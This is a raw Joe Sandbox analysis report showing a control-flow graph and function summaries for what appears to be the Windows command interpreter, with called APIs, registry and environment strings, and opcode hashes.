20466 7ff6a0e84612 20465->20466 20470 7ff6a0e85cb4 7 API calls 20465->20470 20471 7ff6a0e8461c 20466->20471 20473 7ff6a0e847e1 CloseHandle 20466->20473 20467->20464 20467->20465 20485 7ff6a0e9a250 33 API calls 20467->20485 20468 7ff6a0e7cd90 166 API calls 20469 7ff6a0e84724 20468->20469 20472 7ff6a0e8472c _local_unwind 20469->20472 20480 7ff6a0e8473d 20469->20480 20474 7ff6a0e84517 20470->20474 20476 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20471->20476 20472->20480 20473->20471 20477 7ff6a0e833f0 _vsnwprintf 20474->20477 20475->20467 20475->20468 20478 7ff6a0e847fa DeleteProcThreadAttributeList 20476->20478 20479 7ff6a0e84544 20477->20479 20481 7ff6a0e88f80 7 API calls 20478->20481 20482 7ff6a0e8498c 8 API calls 20479->20482 20486 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20480->20486 20483 7ff6a0e84820 20481->20483 20484 7ff6a0e84558 20482->20484 20483->20260 20487 
7ff6a0e84564 20484->20487 20488 7ff6a0e847ae 20484->20488 20485->20465 20490 7ff6a0e8475b _local_unwind 20486->20490 20491 7ff6a0e8498c 8 API calls 20487->20491 20489 7ff6a0e833f0 _vsnwprintf 20488->20489 20489->20466 20490->20467 20492 7ff6a0e84577 20491->20492 20492->20471 20493 7ff6a0e8457f 20492->20493 20494 7ff6a0e9a920 210 API calls 20493->20494 20495 7ff6a0e84584 20494->20495 20495->20471 20513 7ff6a0e79737 20496->20513 20498 7ff6a0e7977d memset 20500 7ff6a0e7ca40 17 API calls 20498->20500 20499 7ff6a0e7cd90 166 API calls 20499->20513 20500->20513 20501 7ff6a0e8b76e 20504 7ff6a0e73278 166 API calls 20501->20504 20502 7ff6a0e8b7b3 20503 7ff6a0e8b79a 20506 7ff6a0e8855c ??_V@YAXPEAX 20503->20506 20507 7ff6a0e8b787 20504->20507 20505 7ff6a0e7b364 17 API calls 20505->20513 20506->20502 20508 7ff6a0e8b795 20507->20508 20623 7ff6a0e9e944 20507->20623 20631 7ff6a0e97694 20508->20631 20513->20498 20513->20499 20513->20501 20513->20502 20513->20503 20513->20505 20513->20513 20514 7ff6a0e7986d 20513->20514 20535 7ff6a0e81fac memset 20513->20535 20562 7ff6a0e7ce10 20513->20562 20612 7ff6a0e796b4 20513->20612 20617 7ff6a0e85920 20513->20617 20516 7ff6a0e7988c 20514->20516 20517 7ff6a0e79880 ??_V@YAXPEAX 20514->20517 20518 7ff6a0e88f80 7 API calls 20516->20518 20517->20516 20519 7ff6a0e7989d 20518->20519 20519->20260 20522 7ff6a0e83a90 170 API calls 20521->20522 20523 7ff6a0e99064 20522->20523 20524 7ff6a0e9906e 20523->20524 20525 7ff6a0e99083 20523->20525 20526 7ff6a0e8498c 8 API calls 20524->20526 20528 7ff6a0e7cd90 166 API calls 20525->20528 20527 7ff6a0e99081 20526->20527 20527->20457 20529 7ff6a0e9909b 20528->20529 20529->20527 20530 7ff6a0e8498c 8 API calls 20529->20530 20531 7ff6a0e990ec 20530->20531 20532 7ff6a0e7ff70 2 API calls 20531->20532 20532->20527 20534 7ff6a0e8ed0a DeleteProcThreadAttributeList 20533->20534 20534->20441 20536 7ff6a0e8203b 20535->20536 20537 7ff6a0e820b0 20536->20537 20538 7ff6a0e82094 20536->20538 20539 7ff6a0e83060 171 API calls 
20537->20539 20541 7ff6a0e8211c 20537->20541 20540 7ff6a0e820a6 20538->20540 20542 7ff6a0e73278 166 API calls 20538->20542 20539->20541 20543 7ff6a0e88f80 7 API calls 20540->20543 20541->20540 20544 7ff6a0e82e44 2 API calls 20541->20544 20542->20540 20545 7ff6a0e82325 20543->20545 20546 7ff6a0e82148 20544->20546 20545->20513 20546->20540 20547 7ff6a0e82d70 3 API calls 20546->20547 20548 7ff6a0e821af 20547->20548 20549 7ff6a0e7b900 166 API calls 20548->20549 20551 7ff6a0e821d0 20549->20551 20550 7ff6a0e8e04a ??_V@YAXPEAX 20550->20540 20551->20550 20552 7ff6a0e8221c wcsspn 20551->20552 20561 7ff6a0e822a4 ??_V@YAXPEAX 20551->20561 20553 7ff6a0e7b900 166 API calls 20552->20553 20555 7ff6a0e8223b 20553->20555 20555->20550 20559 7ff6a0e82252 20555->20559 20556 7ff6a0e8228f 20557 7ff6a0e7d3f0 223 API calls 20556->20557 20557->20561 20558 7ff6a0e8e06d wcschr 20558->20559 20559->20556 20559->20558 20560 7ff6a0e8e090 towupper 20559->20560 20560->20556 20560->20559 20561->20540 20563 7ff6a0e7d0f8 20562->20563 20611 7ff6a0e7ce5b 20562->20611 20564 7ff6a0e88f80 7 API calls 20563->20564 20567 7ff6a0e7d10a 20564->20567 20565 7ff6a0e8c860 20566 7ff6a0e8c97c 20565->20566 20569 7ff6a0e9ee88 390 API calls 20565->20569 20570 7ff6a0e9e9b4 197 API calls 20566->20570 20567->20513 20571 7ff6a0e8c879 20569->20571 20572 7ff6a0e8c981 longjmp 20570->20572 20573 7ff6a0e8c882 EnterCriticalSection LeaveCriticalSection 20571->20573 20574 7ff6a0e8c95c 20571->20574 20575 7ff6a0e8c99a 20572->20575 20581 7ff6a0e7d0e3 20573->20581 20574->20566 20579 7ff6a0e796b4 186 API calls 20574->20579 20575->20563 20578 7ff6a0e8c9b3 ??_V@YAXPEAX 20575->20578 20576 7ff6a0e7cd90 166 API calls 20576->20611 20578->20563 20579->20574 20580 7ff6a0e7ceaa _tell 20582 7ff6a0e7d208 _close 20580->20582 20581->20513 20582->20611 20583 7ff6a0e8c9d5 20584 7ff6a0e9d610 167 API calls 20583->20584 20586 7ff6a0e8c9da 20584->20586 20585 7ff6a0e7b900 166 API calls 20585->20611 20587 7ff6a0e8ca07 20586->20587 20589 7ff6a0e9bfec 176 
API calls 20586->20589 20588 7ff6a0e9e91c 198 API calls 20587->20588 20593 7ff6a0e8ca0c 20588->20593 20590 7ff6a0e8c9f1 20589->20590 20592 7ff6a0e73240 166 API calls 20590->20592 20591 7ff6a0e7cf33 memset 20591->20611 20592->20587 20593->20513 20594 7ff6a0e7ca40 17 API calls 20594->20611 20595 7ff6a0e7d184 wcschr 20595->20611 20596 7ff6a0e9bfec 176 API calls 20596->20611 20597 7ff6a0e8c9c9 20599 7ff6a0e8855c ??_V@YAXPEAX 20597->20599 20598 7ff6a0e7d1a7 wcschr 20598->20611 20599->20563 20601 7ff6a0e80a6c 273 API calls 20601->20611 20602 7ff6a0e7be00 635 API calls 20602->20611 20603 7ff6a0e83448 166 API calls 20603->20611 20604 7ff6a0e80580 12 API calls 20606 7ff6a0e7d003 GetConsoleOutputCP GetCPInfo 20604->20606 20605 7ff6a0e7cfab _wcsicmp 20605->20611 20607 7ff6a0e804f4 3 API calls 20606->20607 20607->20611 20609 7ff6a0e81fac 238 API calls 20609->20611 20610 7ff6a0e7d044 ??_V@YAXPEAX 20610->20611 20611->20563 20611->20565 20611->20575 20611->20576 20611->20581 20611->20583 20611->20585 20611->20591 20611->20594 20611->20595 20611->20596 20611->20597 20611->20598 20611->20601 20611->20602 20611->20603 20611->20604 20611->20605 20611->20609 20611->20610 20637 7ff6a0e80494 20611->20637 20650 7ff6a0e7df60 20611->20650 20670 7ff6a0e9778c 20611->20670 20701 7ff6a0e9c738 20611->20701 20613 7ff6a0e8b6e2 RevertToSelf CloseHandle 20612->20613 20614 7ff6a0e796c8 20612->20614 20615 7ff6a0e796ce 20614->20615 20616 7ff6a0e76a48 184 API calls 20614->20616 20615->20513 20616->20614 20618 7ff6a0e8596c 20617->20618 20622 7ff6a0e85a12 20617->20622 20619 7ff6a0e8598d VirtualQuery 20618->20619 20618->20622 20621 7ff6a0e859ad 20619->20621 20619->20622 20620 7ff6a0e859b7 VirtualQuery 20620->20621 20620->20622 20621->20620 20621->20622 20622->20513 20624 7ff6a0e9e990 20623->20624 20625 7ff6a0e9e954 20623->20625 20626 7ff6a0e9e9b4 197 API calls 20624->20626 20627 7ff6a0e9ee88 390 API calls 20625->20627 20628 7ff6a0e9e995 longjmp 20626->20628 20629 7ff6a0e9e964 20627->20629 20629->20624 
20630 7ff6a0e796b4 186 API calls 20629->20630 20630->20629 20632 7ff6a0e976a3 20631->20632 20633 7ff6a0e976b7 20632->20633 20634 7ff6a0e796b4 186 API calls 20632->20634 20635 7ff6a0e9e9b4 197 API calls 20633->20635 20634->20632 20636 7ff6a0e976bc longjmp 20635->20636 20638 7ff6a0e804a4 20637->20638 20639 7ff6a0e826e0 19 API calls 20638->20639 20640 7ff6a0e804b9 _get_osfhandle SetFilePointer 20638->20640 20641 7ff6a0e8d845 20638->20641 20643 7ff6a0e8d839 20638->20643 20646 7ff6a0e73278 166 API calls 20638->20646 20639->20638 20640->20611 20642 7ff6a0e9f1d8 166 API calls 20641->20642 20645 7ff6a0e8d837 20642->20645 20644 7ff6a0e73278 166 API calls 20643->20644 20644->20645 20647 7ff6a0e8d819 _getch 20646->20647 20647->20638 20648 7ff6a0e8d832 20647->20648 20711 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 20648->20711 20651 7ff6a0e7df93 20650->20651 20652 7ff6a0e7dfe2 20650->20652 20651->20652 20653 7ff6a0e7df9f GetProcessHeap RtlFreeHeap 20651->20653 20654 7ff6a0e7e100 VirtualFree 20652->20654 20655 7ff6a0e7e00b _setjmp 20652->20655 20653->20651 20653->20652 20654->20652 20656 7ff6a0e7e04a 20655->20656 20657 7ff6a0e7e0c3 20655->20657 20658 7ff6a0e7e600 473 API calls 20656->20658 20657->20580 20659 7ff6a0e7e073 20658->20659 20660 7ff6a0e7e081 20659->20660 20661 7ff6a0e7e0e0 longjmp 20659->20661 20662 7ff6a0e7d250 475 API calls 20660->20662 20669 7ff6a0e7e0b0 20661->20669 20663 7ff6a0e7e086 20662->20663 20666 7ff6a0e7e600 473 API calls 20663->20666 20663->20669 20667 7ff6a0e7e0a7 20666->20667 20668 7ff6a0e9d610 167 API calls 20667->20668 20667->20669 20668->20669 20669->20657 20712 7ff6a0e9d3fc 20669->20712 20673 7ff6a0e977bc 20670->20673 20671 7ff6a0e97989 20694 7ff6a0e979ef 20671->20694 20764 7ff6a0e976e0 20671->20764 20672 7ff6a0e97aca 20676 7ff6a0e834a0 166 API calls 20672->20676 20673->20671 20673->20672 20674 7ff6a0e979c0 20673->20674 20677 7ff6a0e97984 20673->20677 20678 7ff6a0e97ab5 20673->20678 20682 7ff6a0e97a00 20673->20682 20685 7ff6a0e83448 166 
API calls 20673->20685 20692 7ff6a0e9778c 166 API calls 20673->20692 20673->20694 20680 7ff6a0e834a0 166 API calls 20674->20680 20679 7ff6a0e97adb 20676->20679 20677->20671 20677->20674 20681 7ff6a0e83448 166 API calls 20678->20681 20683 7ff6a0e83448 166 API calls 20679->20683 20686 7ff6a0e97af0 20679->20686 20689 7ff6a0e979d6 20680->20689 20681->20694 20688 7ff6a0e97a0b 20682->20688 20682->20694 20699 7ff6a0e97a33 20682->20699 20683->20686 20684 7ff6a0e9778c 166 API calls 20687 7ff6a0e97afb 20684->20687 20685->20673 20686->20684 20687->20671 20695 7ff6a0e83448 166 API calls 20687->20695 20688->20694 20696 7ff6a0e834a0 166 API calls 20688->20696 20690 7ff6a0e979e7 20689->20690 20693 7ff6a0e83448 166 API calls 20689->20693 20760 7ff6a0e97730 20690->20760 20692->20673 20693->20690 20694->20611 20695->20671 20698 7ff6a0e97a23 20696->20698 20697 7ff6a0e83448 166 API calls 20697->20694 20700 7ff6a0e9778c 166 API calls 20698->20700 20699->20697 20700->20690 20702 7ff6a0e9c775 20701->20702 20703 7ff6a0e9c7ab 20701->20703 20704 7ff6a0e7cd90 166 API calls 20702->20704 20705 7ff6a0e9c781 20703->20705 20706 7ff6a0e9c8d4 20703->20706 20708 7ff6a0e7b6b0 170 API calls 20703->20708 20709 7ff6a0e7b038 _dup2 20703->20709 20710 7ff6a0e7d208 _close 20703->20710 20704->20705 20705->20706 20707 7ff6a0e7b0d8 194 API calls 20705->20707 20706->20611 20707->20706 20708->20703 20709->20703 20710->20703 20723 7ff6a0e9d419 20712->20723 20713 7ff6a0e8cadf 20714 7ff6a0e83448 166 API calls 20714->20723 20715 7ff6a0e9d592 20717 7ff6a0e83448 166 API calls 20715->20717 20716 7ff6a0e9d5c4 20718 7ff6a0e83448 166 API calls 20716->20718 20720 7ff6a0e9d5a5 20717->20720 20718->20713 20722 7ff6a0e9d5ba 20720->20722 20726 7ff6a0e83448 166 API calls 20720->20726 20721 7ff6a0e9d546 20721->20716 20724 7ff6a0e9d555 20721->20724 20730 7ff6a0e9d36c 20722->20730 20723->20713 20723->20714 20723->20715 20723->20716 20723->20724 20725 7ff6a0e9d541 20723->20725 20728 7ff6a0e9d3fc 166 API calls 20723->20728 20737 
7ff6a0e9d31c 20724->20737 20725->20715 20725->20716 20725->20721 20729 7ff6a0e9d589 20725->20729 20726->20722 20728->20723 20729->20715 20729->20724 20731 7ff6a0e9d381 20730->20731 20732 7ff6a0e9d3d8 20730->20732 20733 7ff6a0e834a0 166 API calls 20731->20733 20735 7ff6a0e9d390 20733->20735 20734 7ff6a0e83448 166 API calls 20734->20735 20735->20732 20735->20734 20736 7ff6a0e834a0 166 API calls 20735->20736 20736->20735 20738 7ff6a0e83448 166 API calls 20737->20738 20739 7ff6a0e9d33b 20738->20739 20740 7ff6a0e9d36c 166 API calls 20739->20740 20741 7ff6a0e9d343 20740->20741 20742 7ff6a0e9d3fc 166 API calls 20741->20742 20759 7ff6a0e9d34e 20742->20759 20743 7ff6a0e9d5c2 20743->20713 20744 7ff6a0e83448 166 API calls 20744->20759 20745 7ff6a0e9d592 20747 7ff6a0e83448 166 API calls 20745->20747 20746 7ff6a0e9d5c4 20748 7ff6a0e83448 166 API calls 20746->20748 20750 7ff6a0e9d5a5 20747->20750 20748->20743 20749 7ff6a0e9d31c 166 API calls 20749->20743 20752 7ff6a0e9d5ba 20750->20752 20755 7ff6a0e83448 166 API calls 20750->20755 20751 7ff6a0e9d546 20751->20746 20753 7ff6a0e9d555 20751->20753 20756 7ff6a0e9d36c 166 API calls 20752->20756 20753->20749 20754 7ff6a0e9d541 20754->20745 20754->20746 20754->20751 20758 7ff6a0e9d589 20754->20758 20755->20752 20756->20743 20757 7ff6a0e9d3fc 166 API calls 20757->20759 20758->20745 20758->20753 20759->20743 20759->20744 20759->20745 20759->20746 20759->20753 20759->20754 20759->20757 20763 7ff6a0e9773c 20760->20763 20761 7ff6a0e9777d 20761->20694 20762 7ff6a0e83448 166 API calls 20762->20763 20763->20761 20763->20762 20765 7ff6a0e9778c 166 API calls 20764->20765 20766 7ff6a0e976fb 20765->20766 20767 7ff6a0e9771c 20766->20767 20768 7ff6a0e83448 166 API calls 20766->20768 20767->20694 20769 7ff6a0e97711 20768->20769 20770 7ff6a0e9778c 166 API calls 20769->20770 20770->20767 20772 7ff6a0e7c4c9 20771->20772 20773 7ff6a0e7c486 20771->20773 20776 7ff6a0e7ff70 2 API calls 20772->20776 20778 7ff6a0e7c161 20772->20778 20774 7ff6a0e7c48e wcschr 
20773->20774 20773->20778 20775 7ff6a0e7c4ef 20774->20775 20774->20778 20777 7ff6a0e7cd90 166 API calls 20775->20777 20776->20778 20784 7ff6a0e7c4f9 20777->20784 20778->20265 20778->20287 20779 7ff6a0e7c541 20779->20778 20781 7ff6a0e7ff70 2 API calls 20779->20781 20780 7ff6a0e7d840 178 API calls 20780->20784 20781->20778 20782 7ff6a0e7b6b0 170 API calls 20782->20779 20783 7ff6a0e7c5bd 20783->20779 20783->20782 20784->20778 20784->20779 20784->20780 20784->20783 20786 7ff6a0e7b018 20785->20786 20786->20326 20787->20326 20789 7ff6a0e88f80 7 API calls 20788->20789 20790 7ff6a0e8296b 20789->20790 20790->20396 20792 7ff6a0e82f2a 20791->20792 20793 7ff6a0e82f97 20791->20793 20794 7ff6a0e8823c 10 API calls 20792->20794 20793->20792 20795 7ff6a0e82f9c wcschr 20793->20795 20797 7ff6a0e82f56 20794->20797 20796 7ff6a0e82fb6 wcschr 20795->20796 20803 7ff6a0e82f5a 20795->20803 20796->20792 20796->20803 20798 7ff6a0e83a0c 2 API calls 20797->20798 20797->20803 20799 7ff6a0e82fe0 20798->20799 20801 7ff6a0e82fe9 wcsrchr 20799->20801 20799->20803 20800 7ff6a0e88f80 7 API calls 20802 7ff6a0e82f83 20800->20802 20801->20803 20802->20396 20803->20800 20804 7ff6a0e8e4ec 20803->20804 20806 7ff6a0e94621 20805->20806 20807 7ff6a0e772de 20805->20807 20808 7ff6a0e947e0 20806->20808 20810 7ff6a0e9447b longjmp 20806->20810 20815 7ff6a0e94639 20806->20815 20822 7ff6a0e9475e 20806->20822 20809 7ff6a0e772eb 20807->20809 20813 7ff6a0e94530 20807->20813 20814 7ff6a0e94467 20807->20814 20811 7ff6a0e77348 168 API calls 20808->20811 20866 7ff6a0e77348 20809->20866 20816 7ff6a0e94492 20810->20816 20865 7ff6a0e94524 20811->20865 20821 7ff6a0e77348 168 API calls 20813->20821 20814->20809 20814->20816 20828 7ff6a0e94475 20814->20828 20818 7ff6a0e9463e 20815->20818 20819 7ff6a0e94695 20815->20819 20820 7ff6a0e77348 168 API calls 20816->20820 20818->20810 20839 7ff6a0e94654 20818->20839 20827 7ff6a0e773d4 168 API calls 20819->20827 20830 7ff6a0e944a8 20820->20830 20833 7ff6a0e94549 20821->20833 20829 
7ff6a0e77348 168 API calls 20822->20829 20823 7ff6a0e77315 20881 7ff6a0e773d4 20823->20881 20824 7ff6a0e772b0 168 API calls 20831 7ff6a0e9480e 20824->20831 20825 7ff6a0e77348 168 API calls 20825->20823 20843 7ff6a0e9469a 20827->20843 20828->20810 20828->20819 20829->20808 20840 7ff6a0e944e2 20830->20840 20846 7ff6a0e77348 168 API calls 20830->20846 20831->20415 20832 7ff6a0e945b2 20834 7ff6a0e77348 168 API calls 20832->20834 20833->20832 20841 7ff6a0e9455e 20833->20841 20852 7ff6a0e77348 168 API calls 20833->20852 20838 7ff6a0e945c7 20834->20838 20835 7ff6a0e77348 168 API calls 20842 7ff6a0e77323 20835->20842 20836 7ff6a0e772b0 168 API calls 20848 7ff6a0e94738 20836->20848 20837 7ff6a0e946e1 20837->20836 20845 7ff6a0e77348 168 API calls 20838->20845 20839->20835 20847 7ff6a0e772b0 168 API calls 20840->20847 20841->20832 20844 7ff6a0e77348 168 API calls 20841->20844 20842->20415 20843->20837 20857 7ff6a0e946c7 20843->20857 20858 7ff6a0e946ea 20843->20858 20844->20832 20851 7ff6a0e945db 20845->20851 20846->20840 20849 7ff6a0e944f1 20847->20849 20850 7ff6a0e77348 168 API calls 20848->20850 20854 7ff6a0e772b0 168 API calls 20849->20854 20850->20865 20853 7ff6a0e77348 168 API calls 20851->20853 20852->20841 20855 7ff6a0e945ec 20853->20855 20856 7ff6a0e94503 20854->20856 20860 7ff6a0e77348 168 API calls 20855->20860 20856->20842 20862 7ff6a0e77348 168 API calls 20856->20862 20857->20837 20863 7ff6a0e77348 168 API calls 20857->20863 20859 7ff6a0e77348 168 API calls 20858->20859 20859->20837 20861 7ff6a0e94600 20860->20861 20864 7ff6a0e77348 168 API calls 20861->20864 20862->20865 20863->20837 20864->20865 20865->20824 20865->20842 20873 7ff6a0e7735d 20866->20873 20867 7ff6a0e73278 166 API calls 20868 7ff6a0e94820 longjmp 20867->20868 20869 7ff6a0e94838 20868->20869 20870 7ff6a0e73278 166 API calls 20869->20870 20871 7ff6a0e94844 longjmp 20870->20871 20872 7ff6a0e9485a 20871->20872 20874 7ff6a0e77348 166 API calls 20872->20874 20873->20867 20873->20869 20873->20873 20880 
7ff6a0e773ab 20873->20880 20875 7ff6a0e9487b 20874->20875 20876 7ff6a0e77348 166 API calls 20875->20876 20877 7ff6a0e948ad 20876->20877 20878 7ff6a0e77348 166 API calls 20877->20878 20879 7ff6a0e772ff 20878->20879 20879->20823 20879->20825 20882 7ff6a0e9485a 20881->20882 20883 7ff6a0e77401 20881->20883 20884 7ff6a0e77348 168 API calls 20882->20884 20883->20842 20885 7ff6a0e9487b 20884->20885 20886 7ff6a0e77348 168 API calls 20885->20886 20887 7ff6a0e948ad 20886->20887 20888 7ff6a0e77348 168 API calls 20887->20888 20889 7ff6a0e948be 20888->20889 20889->20842 16736 7ff6a0e88d80 16737 7ff6a0e88da4 16736->16737 16738 7ff6a0e88db6 16737->16738 16739 7ff6a0e88dbf Sleep 16737->16739 16740 7ff6a0e88ddb _amsg_exit 16738->16740 16742 7ff6a0e88de7 16738->16742 16739->16737 16740->16742 16741 7ff6a0e88e56 _initterm 16744 7ff6a0e88e73 _IsNonwritableInCurrentImage 16741->16744 16742->16741 16743 7ff6a0e88e3c 16742->16743 16742->16744 16750 7ff6a0e837d8 GetCurrentThreadId OpenThread 16744->16750 16783 7ff6a0e804f4 16750->16783 16752 7ff6a0e83839 HeapSetInformation RegOpenKeyExW 16753 7ff6a0e8388d 16752->16753 16754 7ff6a0e8e9f8 RegQueryValueExW RegCloseKey 16752->16754 16755 7ff6a0e85920 VirtualQuery VirtualQuery 16753->16755 16757 7ff6a0e8ea41 GetThreadLocale 16754->16757 16756 7ff6a0e838ab GetConsoleOutputCP GetCPInfo 16755->16756 16756->16757 16758 7ff6a0e838f1 memset 16756->16758 16769 7ff6a0e83919 16757->16769 16758->16769 16759 7ff6a0e84d5c 391 API calls 16759->16769 16760 7ff6a0e83948 _setjmp 16760->16769 16761 7ff6a0e8eb27 _setjmp 16761->16769 16762 7ff6a0e98530 370 API calls 16762->16769 16763 7ff6a0e801b8 6 API calls 16763->16769 16764 7ff6a0e73240 166 API calls 16764->16769 16765 7ff6a0e84c1c 166 API calls 16765->16769 16766 7ff6a0e8eb71 _setmode 16766->16769 16767 7ff6a0e886f0 182 API calls 16767->16769 16768 7ff6a0e80580 12 API calls 16770 7ff6a0e8398b GetConsoleOutputCP GetCPInfo 16768->16770 16769->16754 16769->16759 16769->16760 16769->16761 16769->16762 
16769->16763 16769->16764 16769->16765 16769->16766 16769->16767 16769->16768 16771 7ff6a0e858e4 EnterCriticalSection LeaveCriticalSection 16769->16771 16773 7ff6a0e7be00 647 API calls 16769->16773 16774 7ff6a0e7df60 481 API calls 16769->16774 16775 7ff6a0e858e4 EnterCriticalSection LeaveCriticalSection 16769->16775 16772 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16770->16772 16771->16769 16772->16769 16773->16769 16774->16769 16776 7ff6a0e8ebbe GetConsoleOutputCP GetCPInfo 16775->16776 16777 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16776->16777 16778 7ff6a0e8ebe6 16777->16778 16779 7ff6a0e7be00 647 API calls 16778->16779 16780 7ff6a0e80580 12 API calls 16778->16780 16779->16778 16781 7ff6a0e8ebfc GetConsoleOutputCP GetCPInfo 16780->16781 16782 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16781->16782 16782->16769 16785 7ff6a0e80504 16783->16785 16784 7ff6a0e8051e GetModuleHandleW 16784->16785 16785->16784 16786 7ff6a0e8054d GetProcAddress 16785->16786 16787 7ff6a0e8056c SetThreadLocale 16785->16787 16786->16785
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
• Instruction ID: 4efeee771ca3bf04461ab87d733f6921306c89df7626f763dbba8c621a623b9f
• Opcode Fuzzy Hash: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
• Instruction Fuzzy Hash: 6D42E131A0F783A6EB648B2198442BA67A1FF89B95F144234DD1ECB7D5DF3CE448A340

Control-flow Graph

• Executed
• Not Executed
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                          • API String ID: 972821348-467788257
                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                          • Instruction ID: 81274820d7ba85c82bf1157e7764d68989332536d476beac4afca0a57bf362ff
                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                          • Instruction Fuzzy Hash: 1022B631F0B643B6FB649F2199142B9A6A1FF89B81F498035DA0EC7795DF3CA844E350

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                          • API String ID: 1351325837-2236139042
                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                          • Instruction ID: 7713900477f3f8d8e52751cdd624954ced5c50fbe5774ac975e413b007fd9b75
                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                          • Instruction Fuzzy Hash: 75F17C76B0A743A5EF218F11D9102B966E4FF49B81F944136CA0E977A4EF3CE919E300

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                          • API String ID: 388421343-2905461000
                                                                                          • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                          • Instruction ID: 255a05a14fb6cb33d52738a41380a037e367046f06414d7f9ce9ad700b134595
                                                                                          • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                          • Instruction Fuzzy Hash: 07F13E72A0AB83A6EB60DB21E4447BAB7E4FB89780F544136D94D83755DF3CE448EB00

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                          • API String ID: 145004033-3846321370
                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                          • Instruction ID: dd2d415f5053c54afd40c8c787a3dc5f3a3acde9204612535fdafece7548fd6f
                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                          • Instruction Fuzzy Hash: 65E1763291EA83E6E7508F10E45057AB7B0FB89745F505536FA8E82B58DF7CD548EB00

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                          • API String ID: 2624720099-1920437939
                                                                                          • Opcode ID: 0bf09e208e1b0c6bea64f33002f51ec0bb7d1cb9bc02841e8aeeb1d0e4bcf9a4
                                                                                          • Instruction ID: c786eafd111a8c63eec94746b35b16ada20bbfb6b08092003f3d44e5bcc1eff9
